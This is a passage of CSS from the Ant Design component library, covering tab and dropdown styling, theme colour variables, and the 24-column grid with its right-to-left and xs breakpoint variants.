.ant-tabs-nav .ant-tabs-nav-operations, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-nav-operations { flex: 1 0 auto; flex-direction: column; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-ink-bar { right: 0; } .ant-tabs-left > .ant-tabs-content-holder, .ant-tabs-left > div > .ant-tabs-content-holder { margin-left: -1px; border-left: 1px solid #f0f0f0; } .ant-tabs-left > .ant-tabs-content-holder > .ant-tabs-content > .ant-tabs-tabpane, .ant-tabs-left > div > .ant-tabs-content-holder > .ant-tabs-content > .ant-tabs-tabpane { padding-left: 24px; } .ant-tabs-right > .ant-tabs-nav, .ant-tabs-right > div > .ant-tabs-nav { order: 1; } .ant-tabs-right > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-ink-bar { left: 0; } .ant-tabs-right > .ant-tabs-content-holder, .ant-tabs-right > div > .ant-tabs-content-holder { order: 0; margin-right: -1px; border-right: 1px solid #f0f0f0; } .ant-tabs-right > .ant-tabs-content-holder > .ant-tabs-content > .ant-tabs-tabpane, .ant-tabs-right > div > .ant-tabs-content-holder > .ant-tabs-content > .ant-tabs-tabpane { padding-right: 24px; } .ant-tabs-dropdown { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: absolute; top: -9999px; left: -9999px; z-index: 1050; display: block; } .ant-tabs-dropdown-hidden { display: none; } .ant-tabs-dropdown-menu { max-height: 200px; margin: 0; padding: 4px 0; overflow-x: hidden; overflow-y: auto; text-align: left; list-style-type: none; background-color: #fff; background-clip: padding-box; border-radius: 2px; outline: none; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); } .ant-tabs-dropdown-menu-item { display: flex; align-items: center; min-width: 120px; margin: 0; padding: 5px 12px; overflow: hidden; color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; line-height: 22px; white-space: nowrap; text-overflow: ellipsis; cursor: pointer; transition: all 0.3s; } .ant-tabs-dropdown-menu-item > span { flex: 1; white-space: nowrap; } .ant-tabs-dropdown-menu-item-remove { flex: none; margin-left: 12px; color: rgba(0, 0, 0, 0.45); font-size: 12px; background: transparent; border: 0; cursor: pointer; } .ant-tabs-dropdown-menu-item-remove:hover { color: var(--ant-primary-5); } .ant-tabs-dropdown-menu-item:hover { background: #f5f5f5; } .ant-tabs-dropdown-menu-item-disabled, .ant-tabs-dropdown-menu-item-disabled:hover { color: rgba(0, 0, 0, 0.25); background: transparent; cursor: not-allowed; } .ant-tabs-card > .ant-tabs-nav .ant-tabs-tab, .ant-tabs-card > div > .ant-tabs-nav .ant-tabs-tab { margin: 0; padding: 8px 16px; background: #fafafa; border: 1px solid #f0f0f0; transition: all 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-tabs-card > .ant-tabs-nav .ant-tabs-tab-active, .ant-tabs-card > div > .ant-tabs-nav .ant-tabs-tab-active { color: var(--ant-primary-color); background: #fff; } .ant-tabs-card > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-card > div > .ant-tabs-nav .ant-tabs-ink-bar { visibility: hidden; } .ant-tabs-card.ant-tabs-top > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-card.ant-tabs-bottom > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-card.ant-tabs-top > div > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-card.ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab { margin-left: 2px; } .ant-tabs-card.ant-tabs-top > .ant-tabs-nav .ant-tabs-tab, .ant-tabs-card.ant-tabs-top > div > .ant-tabs-nav .ant-tabs-tab { border-radius: 2px 2px 0 0; } .ant-tabs-card.ant-tabs-top > .ant-tabs-nav .ant-tabs-tab-active, .ant-tabs-card.ant-tabs-top > div > .ant-tabs-nav .ant-tabs-tab-active { border-bottom-color: #fff; } .ant-tabs-card.ant-tabs-bottom > .ant-tabs-nav .ant-tabs-tab, .ant-tabs-card.ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-tab { border-radius: 0 0 2px 2px; } .ant-tabs-card.ant-tabs-bottom > .ant-tabs-nav .ant-tabs-tab-active, .ant-tabs-card.ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-tab-active { border-top-color: #fff; } .ant-tabs-card.ant-tabs-left > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-card.ant-tabs-right > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-card.ant-tabs-left > div > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-card.ant-tabs-right > div > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab { margin-top: 2px; } .ant-tabs-card.ant-tabs-left > .ant-tabs-nav .ant-tabs-tab, .ant-tabs-card.ant-tabs-left > div > .ant-tabs-nav .ant-tabs-tab { border-radius: 2px 0 0 2px; } .ant-tabs-card.ant-tabs-left > .ant-tabs-nav .ant-tabs-tab-active, .ant-tabs-card.ant-tabs-left > div > .ant-tabs-nav .ant-tabs-tab-active { border-right-color: #fff; } .ant-tabs-card.ant-tabs-right > .ant-tabs-nav .ant-tabs-tab, .ant-tabs-card.ant-tabs-right > div > .ant-tabs-nav .ant-tabs-tab { border-radius: 0 2px 2px 0; } .ant-tabs-card.ant-tabs-right > .ant-tabs-nav .ant-tabs-tab-active, .ant-tabs-card.ant-tabs-right > div > .ant-tabs-nav .ant-tabs-tab-active { border-left-color: #fff; } .ant-tabs { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: flex; overflow: hidden; } .ant-tabs > .ant-tabs-nav, .ant-tabs > div > .ant-tabs-nav { position: relative; display: flex; flex: none; align-items: center; } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-wrap, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-wrap { position: relative; display: inline-block; display: flex; flex: auto; align-self: stretch; overflow: hidden; white-space: nowrap; transform: translate(0); } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-wrap::after { position: absolute; z-index: 1; opacity: 0; transition: opacity 0.3s; content: ''; pointer-events: none; } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-list, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-list { position: relative; display: flex; transition: transform 0.3s; } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-operations, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-operations { display: flex; align-self: stretch; } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-operations-hidden, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-operations-hidden { position: absolute; visibility: hidden; pointer-events: none; } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-more, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-more { position: relative; padding: 8px 16px; background: transparent; border: 0; } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-more::after, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-more::after { position: absolute; right: 0; bottom: 0; left: 0; height: 5px; transform: translateY(100%); content: ''; } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-add, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-add { min-width: 40px; margin-left: 2px; padding: 0 8px; background: #fafafa; border: 1px solid #f0f0f0; border-radius: 2px 2px 0 0; outline: none; cursor: pointer; transition: all 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-add:hover, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-add:hover { color: var(--ant-primary-5); } .ant-tabs > .ant-tabs-nav .ant-tabs-nav-add:active, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-add:active, .ant-tabs > .ant-tabs-nav .ant-tabs-nav-add:focus, .ant-tabs > div > .ant-tabs-nav .ant-tabs-nav-add:focus { color: var(--ant-primary-7); } .ant-tabs-extra-content { flex: none; } .ant-tabs-centered > .ant-tabs-nav .ant-tabs-nav-wrap:not([class*='ant-tabs-nav-wrap-ping']), .ant-tabs-centered > div > .ant-tabs-nav .ant-tabs-nav-wrap:not([class*='ant-tabs-nav-wrap-ping']) { justify-content: center; } .ant-tabs-ink-bar { position: absolute; background: var(--ant-primary-color); pointer-events: none; } .ant-tabs-tab { position: relative; display: inline-flex; align-items: center; padding: 12px 0; font-size: 14px; background: transparent; border: 0; outline: none; cursor: pointer; } .ant-tabs-tab-btn:focus, .ant-tabs-tab-remove:focus, .ant-tabs-tab-btn:active, .ant-tabs-tab-remove:active { color: var(--ant-primary-7); } .ant-tabs-tab-btn { outline: none; transition: all 0.3s; } .ant-tabs-tab-remove { flex: none; margin-right: -4px; margin-left: 8px; color: rgba(0, 0, 0, 0.45); font-size: 12px; background: transparent; border: none; outline: none; cursor: pointer; transition: all 0.3s; } .ant-tabs-tab-remove:hover { color: rgba(0, 0, 0, 0.85); } .ant-tabs-tab:hover { color: var(--ant-primary-5); } .ant-tabs-tab.ant-tabs-tab-active .ant-tabs-tab-btn { color: var(--ant-primary-color); text-shadow: 0 0 0.25px currentColor; } .ant-tabs-tab.ant-tabs-tab-disabled { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-tabs-tab.ant-tabs-tab-disabled .ant-tabs-tab-btn:focus, .ant-tabs-tab.ant-tabs-tab-disabled .ant-tabs-tab-remove:focus, .ant-tabs-tab.ant-tabs-tab-disabled .ant-tabs-tab-btn:active, .ant-tabs-tab.ant-tabs-tab-disabled .ant-tabs-tab-remove:active { color: rgba(0, 0, 0, 0.25); } .ant-tabs-tab .ant-tabs-tab-remove .anticon { margin: 0; } .ant-tabs-tab .anticon { margin-right: 12px; } .ant-tabs-tab + .ant-tabs-tab { margin: 0 0 0 32px; } .ant-tabs-content { display: flex; width: 100%; } .ant-tabs-content-holder { flex: auto; min-width: 0; min-height: 0; } .ant-tabs-content-animated { transition: margin 0.3s; } .ant-tabs-tabpane { flex: none; width: 100%; outline: none; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-row { display: flex; flex-flow: row wrap; } .ant-row::before, .ant-row::after { display: flex; } .ant-row-no-wrap { flex-wrap: nowrap; } .ant-row-start { justify-content: flex-start; } .ant-row-center { justify-content: center; } .ant-row-end { justify-content: flex-end; } .ant-row-space-between { justify-content: space-between; } .ant-row-space-around { justify-content: space-around; } .ant-row-top { align-items: flex-start; } .ant-row-middle { align-items: center; } .ant-row-bottom { align-items: flex-end; } .ant-col { position: relative; max-width: 100%; min-height: 1px; } .ant-col-24 { display: block; flex: 0 0 100%; max-width: 100%; } .ant-col-push-24 { left: 100%; } .ant-col-pull-24 { right: 100%; } .ant-col-offset-24 { margin-left: 100%; } .ant-col-order-24 { order: 24; } .ant-col-23 { display: block; flex: 0 0 95.83333333%; max-width: 95.83333333%; } .ant-col-push-23 { left: 95.83333333%; } .ant-col-pull-23 { right: 95.83333333%; } .ant-col-offset-23 { margin-left: 95.83333333%; } .ant-col-order-23 { order: 23; } .ant-col-22 { display: block; flex: 0 0 91.66666667%; max-width: 91.66666667%; } .ant-col-push-22 { left: 91.66666667%; } .ant-col-pull-22 { right: 91.66666667%; } .ant-col-offset-22 { margin-left: 91.66666667%; } .ant-col-order-22 { order: 22; } .ant-col-21 { display: block; flex: 0 0 87.5%; max-width: 87.5%; } .ant-col-push-21 { left: 87.5%; } .ant-col-pull-21 { right: 87.5%; } .ant-col-offset-21 { margin-left: 87.5%; } .ant-col-order-21 { order: 21; } .ant-col-20 { display: block; flex: 0 0 83.33333333%; max-width: 83.33333333%; } .ant-col-push-20 { left: 83.33333333%; } .ant-col-pull-20 { right: 83.33333333%; } .ant-col-offset-20 { margin-left: 83.33333333%; } .ant-col-order-20 { order: 20; } .ant-col-19 { display: block; flex: 0 0 79.16666667%; max-width: 79.16666667%; } .ant-col-push-19 { left: 79.16666667%; } .ant-col-pull-19 { right: 79.16666667%; } .ant-col-offset-19 { margin-left: 79.16666667%; } .ant-col-order-19 { order: 19; } .ant-col-18 { display: block; flex: 0 0 75%; max-width: 75%; } .ant-col-push-18 { left: 75%; } .ant-col-pull-18 { right: 75%; } .ant-col-offset-18 { margin-left: 75%; } .ant-col-order-18 { order: 18; } .ant-col-17 { display: block; flex: 0 0 70.83333333%; max-width: 70.83333333%; } .ant-col-push-17 { left: 70.83333333%; } .ant-col-pull-17 { right: 70.83333333%; } .ant-col-offset-17 { margin-left: 70.83333333%; } .ant-col-order-17 { order: 17; } .ant-col-16 { display: block; flex: 0 0 66.66666667%; max-width: 66.66666667%; } .ant-col-push-16 { left: 66.66666667%; } .ant-col-pull-16 { right: 66.66666667%; } .ant-col-offset-16 { margin-left: 66.66666667%; } .ant-col-order-16 { order: 16; } .ant-col-15 { display: block; flex: 0 0 62.5%; max-width: 62.5%; } .ant-col-push-15 { left: 62.5%; } .ant-col-pull-15 { right: 62.5%; } .ant-col-offset-15 { margin-left: 62.5%; } .ant-col-order-15 { order: 15; } .ant-col-14 { display: block; flex: 0 0 58.33333333%; max-width: 58.33333333%; } .ant-col-push-14 { left: 58.33333333%; } .ant-col-pull-14 { right: 58.33333333%; } .ant-col-offset-14 { margin-left: 58.33333333%; } .ant-col-order-14 { order: 14; } .ant-col-13 { display: block; flex: 0 0 54.16666667%; max-width: 54.16666667%; } .ant-col-push-13 { left: 54.16666667%; } .ant-col-pull-13 { right: 54.16666667%; } .ant-col-offset-13 { margin-left: 54.16666667%; } .ant-col-order-13 { order: 13; } .ant-col-12 { display: block; flex: 0 0 50%; max-width: 50%; } .ant-col-push-12 { left: 50%; } .ant-col-pull-12 { right: 50%; } .ant-col-offset-12 { margin-left: 50%; } .ant-col-order-12 { order: 12; } .ant-col-11 { display: block; flex: 0 0 45.83333333%; max-width: 45.83333333%; } .ant-col-push-11 { left: 45.83333333%; } .ant-col-pull-11 { right: 45.83333333%; } .ant-col-offset-11 { margin-left: 45.83333333%; } .ant-col-order-11 { order: 11; } .ant-col-10 { display: block; flex: 0 0 41.66666667%; max-width: 41.66666667%; } .ant-col-push-10 { left: 41.66666667%; } .ant-col-pull-10 { right: 41.66666667%; } .ant-col-offset-10 { margin-left: 41.66666667%; } .ant-col-order-10 { order: 10; } .ant-col-9 { display: block; flex: 0 0 37.5%; max-width: 37.5%; } .ant-col-push-9 { left: 37.5%; } .ant-col-pull-9 { right: 37.5%; } .ant-col-offset-9 { margin-left: 37.5%; } .ant-col-order-9 { order: 9; } .ant-col-8 { display: block; flex: 0 0 33.33333333%; max-width: 33.33333333%; } .ant-col-push-8 { left: 33.33333333%; } .ant-col-pull-8 { right: 33.33333333%; } .ant-col-offset-8 { margin-left: 33.33333333%; } .ant-col-order-8 { order: 8; } .ant-col-7 { display: block; flex: 0 0 29.16666667%; max-width: 29.16666667%; } .ant-col-push-7 { left: 29.16666667%; } .ant-col-pull-7 { right: 29.16666667%; } .ant-col-offset-7 { margin-left: 29.16666667%; } .ant-col-order-7 { order: 7; } .ant-col-6 { display: block; flex: 0 0 25%; max-width: 25%; } .ant-col-push-6 { left: 25%; } .ant-col-pull-6 { right: 25%; } .ant-col-offset-6 { margin-left: 25%; } .ant-col-order-6 { order: 6; } .ant-col-5 { display: block; flex: 0 0 20.83333333%; max-width: 20.83333333%; } .ant-col-push-5 { left: 20.83333333%; } .ant-col-pull-5 { right: 20.83333333%; } .ant-col-offset-5 { margin-left: 20.83333333%; } .ant-col-order-5 { order: 5; } .ant-col-4 { display: block; flex: 0 0 16.66666667%; max-width: 16.66666667%; } .ant-col-push-4 { left: 16.66666667%; } .ant-col-pull-4 { right: 16.66666667%; } .ant-col-offset-4 { margin-left: 16.66666667%; } .ant-col-order-4 { order: 4; } .ant-col-3 { display: block; flex: 0 0 12.5%; max-width: 12.5%; } .ant-col-push-3 { left: 12.5%; } .ant-col-pull-3 { right: 12.5%; } .ant-col-offset-3 { margin-left: 12.5%; } .ant-col-order-3 { order: 3; } .ant-col-2 { display: block; flex: 0 0 8.33333333%; max-width: 8.33333333%; } .ant-col-push-2 { left: 8.33333333%; } .ant-col-pull-2 { right: 8.33333333%; } .ant-col-offset-2 { margin-left: 8.33333333%; } .ant-col-order-2 { order: 2; } .ant-col-1 { display: block; flex: 0 0 4.16666667%; max-width: 4.16666667%; } .ant-col-push-1 { left: 4.16666667%; } .ant-col-pull-1 { right: 4.16666667%; } .ant-col-offset-1 { margin-left: 4.16666667%; } .ant-col-order-1 { order: 1; } .ant-col-0 { display: none; } .ant-col-push-0 { left: auto; } .ant-col-pull-0 { right: auto; } .ant-col-push-0 { left: auto; } .ant-col-pull-0 { right: auto; } .ant-col-offset-0 { margin-left: 0; } .ant-col-order-0 { order: 0; } .ant-col-push-0.ant-col-rtl { right: auto; } .ant-col-pull-0.ant-col-rtl { left: auto; } .ant-col-push-0.ant-col-rtl { right: auto; } .ant-col-pull-0.ant-col-rtl { left: auto; } .ant-col-offset-0.ant-col-rtl { margin-right: 0; } .ant-col-push-1.ant-col-rtl { right: 4.16666667%; left: auto; } .ant-col-pull-1.ant-col-rtl { right: auto; left: 4.16666667%; } .ant-col-offset-1.ant-col-rtl { margin-right: 4.16666667%; margin-left: 0; } .ant-col-push-2.ant-col-rtl { right: 8.33333333%; left: auto; } .ant-col-pull-2.ant-col-rtl { right: auto; left: 8.33333333%; } .ant-col-offset-2.ant-col-rtl { margin-right: 8.33333333%; margin-left: 0; } .ant-col-push-3.ant-col-rtl { right: 12.5%; left: auto; } .ant-col-pull-3.ant-col-rtl { right: auto; left: 12.5%; } .ant-col-offset-3.ant-col-rtl { margin-right: 12.5%; margin-left: 0; } .ant-col-push-4.ant-col-rtl { right: 16.66666667%; left: auto; } .ant-col-pull-4.ant-col-rtl { right: auto; left: 16.66666667%; } .ant-col-offset-4.ant-col-rtl { margin-right: 16.66666667%; margin-left: 0; } .ant-col-push-5.ant-col-rtl { right: 20.83333333%; left: auto; } .ant-col-pull-5.ant-col-rtl { right: auto; left: 20.83333333%; } .ant-col-offset-5.ant-col-rtl { margin-right: 20.83333333%; margin-left: 0; } .ant-col-push-6.ant-col-rtl { right: 25%; left: auto; } .ant-col-pull-6.ant-col-rtl { right: auto; left: 25%; } .ant-col-offset-6.ant-col-rtl { margin-right: 25%; margin-left: 0; } .ant-col-push-7.ant-col-rtl { right: 29.16666667%; left: auto; } .ant-col-pull-7.ant-col-rtl { right: auto; left: 29.16666667%; } .ant-col-offset-7.ant-col-rtl { margin-right: 29.16666667%; margin-left: 0; } .ant-col-push-8.ant-col-rtl { right: 33.33333333%; left: auto; } .ant-col-pull-8.ant-col-rtl { right: auto; left: 33.33333333%; } .ant-col-offset-8.ant-col-rtl { margin-right: 33.33333333%; margin-left: 0; } .ant-col-push-9.ant-col-rtl { right: 37.5%; left: auto; } .ant-col-pull-9.ant-col-rtl { right: auto; left: 37.5%; } .ant-col-offset-9.ant-col-rtl { margin-right: 37.5%; margin-left: 0; } .ant-col-push-10.ant-col-rtl { right: 41.66666667%; left: auto; } .ant-col-pull-10.ant-col-rtl { right: auto; left: 41.66666667%; } .ant-col-offset-10.ant-col-rtl { margin-right: 41.66666667%; margin-left: 0; } .ant-col-push-11.ant-col-rtl { right: 45.83333333%; left: auto; } .ant-col-pull-11.ant-col-rtl { right: auto; left: 45.83333333%; } .ant-col-offset-11.ant-col-rtl { margin-right: 45.83333333%; margin-left: 0; } .ant-col-push-12.ant-col-rtl { right: 50%; left: auto; } .ant-col-pull-12.ant-col-rtl { right: auto; left: 50%; } .ant-col-offset-12.ant-col-rtl { margin-right: 50%; margin-left: 0; } .ant-col-push-13.ant-col-rtl { right: 54.16666667%; left: auto; } .ant-col-pull-13.ant-col-rtl { right: auto; left: 54.16666667%; } .ant-col-offset-13.ant-col-rtl { margin-right: 54.16666667%; margin-left: 0; } .ant-col-push-14.ant-col-rtl { right: 58.33333333%; left: auto; } .ant-col-pull-14.ant-col-rtl { right: auto; left: 58.33333333%; } .ant-col-offset-14.ant-col-rtl { margin-right: 58.33333333%; margin-left: 0; } .ant-col-push-15.ant-col-rtl { right: 62.5%; left: auto; } .ant-col-pull-15.ant-col-rtl { right: auto; left: 62.5%; } .ant-col-offset-15.ant-col-rtl { margin-right: 62.5%; margin-left: 0; } .ant-col-push-16.ant-col-rtl { right: 66.66666667%; left: auto; } .ant-col-pull-16.ant-col-rtl { right: auto; left: 66.66666667%; } .ant-col-offset-16.ant-col-rtl { margin-right: 66.66666667%; margin-left: 0; } .ant-col-push-17.ant-col-rtl { right: 70.83333333%; left: auto; } .ant-col-pull-17.ant-col-rtl { right: auto; left: 70.83333333%; } .ant-col-offset-17.ant-col-rtl { margin-right: 70.83333333%; margin-left: 0; } .ant-col-push-18.ant-col-rtl { right: 75%; left: auto; } .ant-col-pull-18.ant-col-rtl { right: auto; left: 75%; } .ant-col-offset-18.ant-col-rtl { margin-right: 75%; margin-left: 0; } .ant-col-push-19.ant-col-rtl { right: 79.16666667%; left: auto; } .ant-col-pull-19.ant-col-rtl { right: auto; left: 79.16666667%; } .ant-col-offset-19.ant-col-rtl { margin-right: 79.16666667%; margin-left: 0; } .ant-col-push-20.ant-col-rtl { right: 83.33333333%; left: auto; } .ant-col-pull-20.ant-col-rtl { right: auto; left: 83.33333333%; } .ant-col-offset-20.ant-col-rtl { margin-right: 83.33333333%; margin-left: 0; } .ant-col-push-21.ant-col-rtl { right: 87.5%; left: auto; } .ant-col-pull-21.ant-col-rtl { right: auto; left: 87.5%; } .ant-col-offset-21.ant-col-rtl { margin-right: 87.5%; margin-left: 0; } .ant-col-push-22.ant-col-rtl { right: 91.66666667%; left: auto; } .ant-col-pull-22.ant-col-rtl { right: auto; left: 91.66666667%; } .ant-col-offset-22.ant-col-rtl { margin-right: 91.66666667%; margin-left: 0; } .ant-col-push-23.ant-col-rtl { right: 95.83333333%; left: auto; } .ant-col-pull-23.ant-col-rtl { right: auto; left: 95.83333333%; } .ant-col-offset-23.ant-col-rtl { margin-right: 95.83333333%; margin-left: 0; } .ant-col-push-24.ant-col-rtl { right: 100%; left: auto; } .ant-col-pull-24.ant-col-rtl { right: auto; left: 100%; } .ant-col-offset-24.ant-col-rtl { margin-right: 100%; margin-left: 0; } .ant-col-xs-24 { display: block; flex: 0 0 100%; max-width: 100%; } .ant-col-xs-push-24 { left: 100%; } .ant-col-xs-pull-24 { right: 100%; } .ant-col-xs-offset-24 { margin-left: 100%; } .ant-col-xs-order-24 { order: 24; } .ant-col-xs-23 { display: block; flex: 0 0 95.83333333%; max-width: 95.83333333%; } .ant-col-xs-push-23 { left: 95.83333333%; } .ant-col-xs-pull-23 { right: 95.83333333%; } .ant-col-xs-offset-23 { margin-left: 95.83333333%; } .ant-col-xs-order-23 { order: 23; } .ant-col-xs-22 { display: block; flex: 0 0 91.66666667%; max-width: 91.66666667%; } .ant-col-xs-push-22 { left: 91.66666667%; } .ant-col-xs-pull-22 { right: 91.66666667%; } .ant-col-xs-offset-22 { margin-left: 91.66666667%; } .ant-col-xs-order-22 { order: 22; } .ant-col-xs-21 { display: block; flex: 0 0 87.5%; max-width: 87.5%; } .ant-col-xs-push-21 { left: 87.5%; } .ant-col-xs-pull-21 { right: 87.5%; } .ant-col-xs-offset-21 { margin-left: 87.5%; } .ant-col-xs-order-21 { order: 21; } .ant-col-xs-20 { display: block; flex: 0 0 83.33333333%; max-width: 83.33333333%; } .ant-col-xs-push-20 { left: 83.33333333%; } .ant-col-xs-pull-20 { right: 83.33333333%; } .ant-col-xs-offset-20 { margin-left: 83.33333333%; } .ant-col-xs-order-20 { order: 20; } .ant-col-xs-19 { display: block; flex: 0 0 79.16666667%; max-width: 79.16666667%; } .ant-col-xs-push-19 { left: 79.16666667%; } .ant-col-xs-pull-19 { right: 79.16666667%; } .ant-col-xs-offset-19 { margin-left: 79.16666667%; } .ant-col-xs-order-19 { order: 19; } .ant-col-xs-18 { display: block; flex: 0 0 75%; max-width: 75%; } .ant-col-xs-push-18 { left: 75%; } .ant-col-xs-pull-18 { right: 75%; } .ant-col-xs-offset-18 { margin-left: 75%; } .ant-col-xs-order-18 { order: 18; } .ant-col-xs-17 { display: block; flex: 0 0 70.83333333%; max-width: 70.83333333%; } .ant-col-xs-push-17 { left: 70.83333333%; } .ant-col-xs-pull-17 { right: 70.83333333%; } .ant-col-xs-offset-17 { margin-left: 70.83333333%; } .ant-col-xs-order-17 { order: 17; } .ant-col-xs-16 { display: block; flex: 0 0 66.66666667%; max-width: 66.66666667%; } .ant-col-xs-push-16 { left: 66.66666667%; } .ant-col-xs-pull-16 { right: 66.66666667%; } .ant-col-xs-offset-16 { margin-left: 66.66666667%; } .ant-col-xs-order-16 { order: 16; } .ant-col-xs-15 { display: block; flex: 0 0 62.5%; max-width: 62.5%; } .ant-col-xs-push-15 { left: 62.5%; } .ant-col-xs-pull-15 { right: 62.5%; } .ant-col-xs-offset-15 { margin-left: 62.5%; } .ant-col-xs-order-15 { order: 15; } .ant-col-xs-14 { display: block; flex: 0 0 58.33333333%; max-width: 58.33333333%; } .ant-col-xs-push-14 { left: 58.33333333%; } .ant-col-xs-pull-14 { right: 58.33333333%; } .ant-col-xs-offset-14 { margin-left: 58.33333333%; } .ant-col-xs-order-14 { order: 14; } .ant-col-xs-13 { display: block; flex: 0 0 54.16666667%; max-width: 54.16666667%; } .ant-col-xs-push-13 { left: 54.16666667%; } .ant-col-xs-pull-13 { right: 54.16666667%; } .ant-col-xs-offset-13 { margin-left: 54.16666667%; } .ant-col-xs-order-13 { order: 13; } .ant-col-xs-12 { display: block; flex: 0 0 50%; max-width: 50%; } .ant-col-xs-push-12 { left: 50%; } .ant-col-xs-pull-12 { right: 50%; } .ant-col-xs-offset-12 { margin-left: 50%; } .ant-col-xs-order-12 { order: 12; } .ant-col-xs-11 { display: block; flex: 0 0 45.83333333%; max-width: 45.83333333%; } .ant-col-xs-push-11 { left: 45.83333333%; } .ant-col-xs-pull-11 { right: 45.83333333%; } .ant-col-xs-offset-11 { margin-left: 45.83333333%; } .ant-col-xs-order-11 { order: 11; } .ant-col-xs-10 { display: block; flex: 0 0 41.66666667%; max-width: 41.66666667%; } .ant-col-xs-push-10 { left: 41.66666667%; } .ant-col-xs-pull-10 { right: 41.66666667%; } .ant-col-xs-offset-10 { margin-left: 41.66666667%; } .ant-col-xs-order-10 { order: 10; } .ant-col-xs-9 { display: block; flex: 0 0 37.5%; max-width: 37.5%; } .ant-col-xs-push-9 { left: 37.5%; } .ant-col-xs-pull-9 { right: 37.5%; } .ant-col-xs-offset-9 { margin-left: 37.5%; } .ant-col-xs-order-9 { order: 9; } .ant-col-xs-8 { display: block; flex: 0 0 33.33333333%; max-width: 33.33333333%; } .ant-col-xs-push-8 { left: 33.33333333%; } .ant-col-xs-pull-8 { right: 33.33333333%; } .ant-col-xs-offset-8 { margin-left: 33.33333333%; } .ant-col-xs-order-8 { order: 8; } .ant-col-xs-7 { display: block; flex: 0 0 29.16666667%; max-width: 29.16666667%; } .ant-col-xs-push-7 { left: 29.16666667%; } .ant-col-xs-pull-7 { right: 29.16666667%; } .ant-col-xs-offset-7 { margin-left: 29.16666667%; } .ant-col-xs-order-7 { order: 7; } .ant-col-xs-6 { display: block; flex: 0 0 25%; max-width: 25%; } .ant-col-xs-push-6 